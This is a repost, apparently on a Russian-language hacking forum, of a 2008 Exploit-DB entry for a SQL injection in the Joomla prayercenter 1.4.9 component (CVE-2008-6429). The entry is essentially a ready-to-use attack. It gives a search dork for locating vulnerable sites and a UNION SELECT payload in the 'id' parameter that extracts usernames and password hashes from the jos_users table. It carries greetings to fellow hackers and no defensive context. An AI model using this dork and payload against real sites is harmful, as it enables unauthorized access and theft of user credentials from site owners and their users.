Exploit Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5708
Проверка EDB
  1. Пройдено
Автор
HIS0K4
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6429
Дата публикации
2008-05-31
Код:
/---------------------------------------------------------------\
\                                				/
/      Joomla Component  prayercenter  Remote SQL injection     \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:"com_prayercenter"

[*] POC        : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

[*] Note       : Sometimes you need to register for doing this exploit
                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2 : http://www.palcastle.org/cc

# milw0rm.com [2008-05-31]
 
Источник
www.exploit-db.com

Похожие темы